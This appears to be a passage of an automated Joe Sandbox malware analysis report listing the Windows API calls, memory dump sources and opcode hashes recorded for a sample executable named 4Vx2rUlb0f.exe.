                                                                                                                                • Instruction Fuzzy Hash: CAF0B4765006008BE3416794AD05B977764EFD4314F19407EEF84B62E1DB795C418F5D
                                                                                                                                APIs
                                                                                                                                • GetModuleHandleA.KERNEL32(?,00000020,?,00403309,00000009), ref: 0040643C
                                                                                                                                • GetProcAddress.KERNEL32(00000000,?), ref: 00406457
                                                                                                                                  • Part of subcall function 004063BA: GetSystemDirectoryW.KERNEL32(?,00000104), ref: 004063D1
                                                                                                                                  • Part of subcall function 004063BA: wsprintfW.USER32 ref: 0040640C
                                                                                                                                  • Part of subcall function 004063BA: LoadLibraryExW.KERNEL32(?,00000000,00000008), ref: 00406420
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.1829669806.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                • Associated: 00000000.00000002.1829649472.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1829690838.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1829718865.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1829718865.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1829718865.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1829718865.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1829718865.0000000000439000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1829718865.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1829718865.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1829896250.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_400000_4Vx2rUlb0f.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: AddressDirectoryHandleLibraryLoadModuleProcSystemwsprintf
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 2547128583-0
                                                                                                                                • Opcode ID: 82069e22af83b56f915537a5bbc2862a2b5ba3ad8f84c774fb382a69f2dcb8e0
                                                                                                                                • Instruction ID: 08b0c8f2ef2dcefd2b61a20e7fd6ba3d75d00ffdaa245a95e4079d340ab3ded5
                                                                                                                                • Opcode Fuzzy Hash: 82069e22af83b56f915537a5bbc2862a2b5ba3ad8f84c774fb382a69f2dcb8e0
                                                                                                                                • Instruction Fuzzy Hash: D2E0863260462056D25197745E4493773AD9E99744302043EFA46F2080DB789C329B6E
                                                                                                                                APIs
                                                                                                                                • ShowWindow.USER32(00000000,00000000,00000001), ref: 00401DF2
                                                                                                                                • EnableWindow.USER32(00000000,00000000), ref: 00401DFD
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.1829669806.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                • Associated: 00000000.00000002.1829649472.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1829690838.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1829718865.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1829718865.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1829718865.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1829718865.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1829718865.0000000000439000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1829718865.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1829718865.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1829896250.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_400000_4Vx2rUlb0f.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: Window$EnableShow
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 1136574915-0
                                                                                                                                • Opcode ID: e82e6f1ee631e9591c04bcc807b45cf067b06efe57e1aced68e9ea86292db559
                                                                                                                                • Instruction ID: 183564fed45e15aac194635682d2540e1570045d11d23ff7c62c61356a4b5cad
                                                                                                                                • Opcode Fuzzy Hash: e82e6f1ee631e9591c04bcc807b45cf067b06efe57e1aced68e9ea86292db559
                                                                                                                                • Instruction Fuzzy Hash: 92E0C2326005009FDB10AFF5AE4999D3375DF90369710007FE402F10E1CABC9C40CA2D
                                                                                                                                APIs
                                                                                                                                • GetFileAttributesW.KERNELBASE(00000003,00402E2E,C:\Users\user\Desktop\4Vx2rUlb0f.exe,80000000,00000003,?,?,"C:\Users\user\Desktop\4Vx2rUlb0f.exe",00403536,?), ref: 00405C29
                                                                                                                                • CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,"C:\Users\user\Desktop\4Vx2rUlb0f.exe",00403536,?), ref: 00405C4B
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.1829669806.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                • Associated: 00000000.00000002.1829649472.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1829690838.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1829718865.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1829718865.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1829718865.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1829718865.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1829718865.0000000000439000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1829718865.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1829718865.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1829896250.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_400000_4Vx2rUlb0f.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: File$AttributesCreate
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 415043291-0
                                                                                                                                • Opcode ID: c97765c4049bc943dbf434cc8e3c5f5e58d45e95167aa4d8b6d1a3ab64a9aeda
                                                                                                                                • Instruction ID: a29eaa7254a97888a18cbfd792fe15e84c6d283973f4e4682f27fdddc38ff468
                                                                                                                                • Opcode Fuzzy Hash: c97765c4049bc943dbf434cc8e3c5f5e58d45e95167aa4d8b6d1a3ab64a9aeda
                                                                                                                                • Instruction Fuzzy Hash: 71D09E71654601AFEF098F20DE16F2E7AA2FB84B00F11562CB682940E0DAB158199B15
                                                                                                                                APIs
                                                                                                                                • GetFileAttributesW.KERNELBASE(?,?,00405805,?,?,00000000,004059DB,?,?,?,?), ref: 00405C05
                                                                                                                                • SetFileAttributesW.KERNEL32(?,00000000), ref: 00405C19
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.1829669806.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                • Associated: 00000000.00000002.1829649472.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1829690838.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1829718865.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1829718865.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1829718865.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1829718865.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1829718865.0000000000439000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1829718865.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1829718865.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1829896250.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_400000_4Vx2rUlb0f.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: AttributesFile
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 3188754299-0
                                                                                                                                • Opcode ID: 2eea293136030474feb3e1a7c5b1a6ed000805180dcccd9d627e45cfe66d6639
                                                                                                                                • Instruction ID: cd99531f96ac703a51573f19c9b8cc9de44b2267bcc9c0d579c2fc711e4bd44e
                                                                                                                                • Opcode Fuzzy Hash: 2eea293136030474feb3e1a7c5b1a6ed000805180dcccd9d627e45cfe66d6639
                                                                                                                                • Instruction Fuzzy Hash: 3AD0C972504520ABC2102738AE0889BBB55EB952717024B39FAA9A22B0CB304C568A98
                                                                                                                                APIs
                                                                                                                                • CreateDirectoryW.KERNELBASE(?,00000000,00403293,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004034C8), ref: 00405701
                                                                                                                                • GetLastError.KERNEL32 ref: 0040570F
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.1829669806.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                • Associated: 00000000.00000002.1829649472.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1829690838.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1829718865.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1829718865.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1829718865.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1829718865.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1829718865.0000000000439000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1829718865.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1829718865.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1829896250.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_400000_4Vx2rUlb0f.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: CreateDirectoryErrorLast
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 1375471231-0
                                                                                                                                • Opcode ID: 0964e43d4f51b800c832a37fa1186c7301bf32e9249ac1f93b451144f827c630
                                                                                                                                • Instruction ID: e63be1853aafe68c2793134b37a867bebc3d2beebaf226ad42ac31f610d1a78e
                                                                                                                                • Opcode Fuzzy Hash: 0964e43d4f51b800c832a37fa1186c7301bf32e9249ac1f93b451144f827c630
                                                                                                                                • Instruction Fuzzy Hash: 7CC04C30225602DBDA105B60DE087177A94AB90741F118439A146E21A0DA348415ED2D
                                                                                                                                APIs
                                                                                                                                • WritePrivateProfileStringW.KERNEL32(00000000,00000000,?,00000000), ref: 004022D4
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.1829669806.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                • Associated: 00000000.00000002.1829649472.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1829690838.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1829718865.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1829718865.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1829718865.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1829718865.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1829718865.0000000000439000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1829718865.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1829718865.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1829896250.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_400000_4Vx2rUlb0f.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: PrivateProfileStringWrite
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 390214022-0
                                                                                                                                • Opcode ID: 014b14aad264ab3d9278ecb8b720997d0a3792ab61640f4b6d401bffeacc1512
                                                                                                                                • Instruction ID: a822d11f1d05533bca3208a69e79300e3559a9020bae074bf72d5f6ed1f8f9d7
                                                                                                                                • Opcode Fuzzy Hash: 014b14aad264ab3d9278ecb8b720997d0a3792ab61640f4b6d401bffeacc1512
                                                                                                                                • Instruction Fuzzy Hash: BCE04F319001246ADB113EF10E8ED7F31695B40314B1405BFB551B66C6D9FC0D4246A9
                                                                                                                                APIs
                                                                                                                                • WriteFile.KERNELBASE(00000000,00000000,00000004,00000004,00000000,000000FF,?,0040320B,00000000,00416A00,000000FF,00416A00,000000FF,000000FF,00000004,00000000), ref: 00405CEB
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.1829669806.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                • Associated: 00000000.00000002.1829649472.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1829690838.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1829718865.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1829718865.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1829718865.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1829718865.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1829718865.0000000000439000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1829718865.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1829718865.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1829896250.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_400000_4Vx2rUlb0f.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: FileWrite
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 3934441357-0
                                                                                                                                • Opcode ID: 6919b523ba5b1b84b4b924eeaf28b73d4aab7fc63dbc8f700f0d9cb823d33c03
                                                                                                                                • Instruction ID: cd54f3301e23830850d9ea58ef2d9b6b3716dac1cb42590a0fcdec79a0e610d3
                                                                                                                                • Opcode Fuzzy Hash: 6919b523ba5b1b84b4b924eeaf28b73d4aab7fc63dbc8f700f0d9cb823d33c03
                                                                                                                                • Instruction Fuzzy Hash: 77E0EC3221425EABDF109E959C04EEB7B6CEB05360F048437FD16E2150D631E921ABA8
                                                                                                                                APIs
                                                                                                                                • ReadFile.KERNELBASE(00000000,00000000,00000004,00000004,00000000,000000FF,?,00403255,00000000,00000000,00403079,000000FF,00000004,00000000,00000000,00000000), ref: 00405CBC
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.1829669806.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                • Associated: 00000000.00000002.1829649472.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1829690838.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1829718865.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1829718865.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1829718865.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1829718865.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1829718865.0000000000439000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1829718865.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1829718865.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1829896250.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_400000_4Vx2rUlb0f.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: FileRead
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 2738559852-0
                                                                                                                                • Opcode ID: 367723d41a66009c2099c483b716accd4a6fea8915a9694eb2152ff5aa97eb4c
                                                                                                                                • Instruction ID: ab2ba72c7da8d0590a5026c7b9f2a747677d692c160b15db9e96a66b9068c41a
                                                                                                                                • Opcode Fuzzy Hash: 367723d41a66009c2099c483b716accd4a6fea8915a9694eb2152ff5aa97eb4c
                                                                                                                                • Instruction Fuzzy Hash: 01E0EC3221425AABEF109E659C04EEB7B6CEB15361F104437F915F6150E631E861ABB4
                                                                                                                                APIs
                                                                                                                                • SetFileAttributesW.KERNELBASE(00000000,?,000000F0), ref: 004015A6
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.1829669806.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                • Associated: 00000000.00000002.1829649472.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1829690838.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1829718865.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1829718865.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1829718865.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1829718865.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1829718865.0000000000439000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1829718865.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1829718865.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1829896250.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_400000_4Vx2rUlb0f.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: AttributesFile
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 3188754299-0
                                                                                                                                • Opcode ID: 62695d5c8c86e882195e65ce0f7765e430518bd8f6887f1e42abcc260ebb5c8d
                                                                                                                                • Instruction ID: 76e81b74098be2a3706baaa1e1a2527734eadd1478321fb398c06c814fc07831
                                                                                                                                • Opcode Fuzzy Hash: 62695d5c8c86e882195e65ce0f7765e430518bd8f6887f1e42abcc260ebb5c8d
                                                                                                                                • Instruction Fuzzy Hash: B5D05E33B05100DBDB10DFE8AE08ADD77B5AB80338B24817BE601F21E4D6B8C6509B1D
                                                                                                                                APIs
                                                                                                                                • SendMessageW.USER32(00010488,00000000,00000000,00000000), ref: 00404172
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.1829669806.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                • Associated: 00000000.00000002.1829649472.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1829690838.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1829718865.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1829718865.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1829718865.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1829718865.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1829718865.0000000000439000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1829718865.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1829718865.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1829896250.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_400000_4Vx2rUlb0f.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: MessageSend
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 3850602802-0
                                                                                                                                • Opcode ID: 13c84271a77af59bb4435d25b14bc6de72d6595d127670e1db8d8b2520383cf4
                                                                                                                                • Instruction ID: c65f6eba747e04129790f2b1b21bae9375029ebd28d99582ecd6e8b4464eea9f
                                                                                                                                • Opcode Fuzzy Hash: 13c84271a77af59bb4435d25b14bc6de72d6595d127670e1db8d8b2520383cf4
                                                                                                                                • Instruction Fuzzy Hash: 56C09B717447007BDA119F609D4DF1777646764702F1544797344F51D0C774D450D61C
                                                                                                                                APIs
                                                                                                                                • SendMessageW.USER32(00000028,?,00000001,00403F75), ref: 00404157
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.1829669806.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                • Associated: 00000000.00000002.1829649472.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1829690838.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1829718865.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1829718865.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1829718865.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1829718865.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1829718865.0000000000439000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1829718865.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1829718865.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1829896250.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_400000_4Vx2rUlb0f.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: MessageSend
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 3850602802-0
                                                                                                                                • Opcode ID: 2cd36f0d48dcadf8a0967ef3185ed5b2b885b7484726fb5ce8841cd1b5828a50
                                                                                                                                • Instruction ID: 10f0f1b1c79289e67bc844ccbe5aec3c597dbf8b190d8890215e27c6ac549869
                                                                                                                                • Opcode Fuzzy Hash: 2cd36f0d48dcadf8a0967ef3185ed5b2b885b7484726fb5ce8841cd1b5828a50
                                                                                                                                • Instruction Fuzzy Hash: 27B0123A180A00BBDE118B00EE0AF857E62F7AC701F018438B340250F0CAF300E0DB08
                                                                                                                                APIs
                                                                                                                                • SetFilePointer.KERNELBASE(00000000,00000000,00000000,00402FB5,?,?,?,"C:\Users\user\Desktop\4Vx2rUlb0f.exe",00403536,?), ref: 00403266
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.1829669806.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                • Associated: 00000000.00000002.1829649472.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1829690838.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1829718865.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1829718865.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1829718865.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1829718865.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1829718865.0000000000439000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1829718865.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1829718865.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1829896250.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_400000_4Vx2rUlb0f.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: FilePointer
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 973152223-0
                                                                                                                                • Opcode ID: 1c6da78d27ebc38603b4c87e6ff41e0916c1b34e9bb95e36f46a9ca6431a4e31
                                                                                                                                • Instruction ID: 64c0fffafe8abe290eaf2022e63b776f1a4a3bd25e2fde741040b5855636c72c
                                                                                                                                • Opcode Fuzzy Hash: 1c6da78d27ebc38603b4c87e6ff41e0916c1b34e9bb95e36f46a9ca6431a4e31
                                                                                                                                • Instruction Fuzzy Hash: 70B01231140300BFDA214F00DF09F057B21AB90700F10C034B344780F086711075EB0D
                                                                                                                                APIs
                                                                                                                                • KiUserCallbackDispatcher.NTDLL(?,00403F0E), ref: 00404140
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.1829669806.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                • Associated: 00000000.00000002.1829649472.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1829690838.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1829718865.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1829718865.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1829718865.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1829718865.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
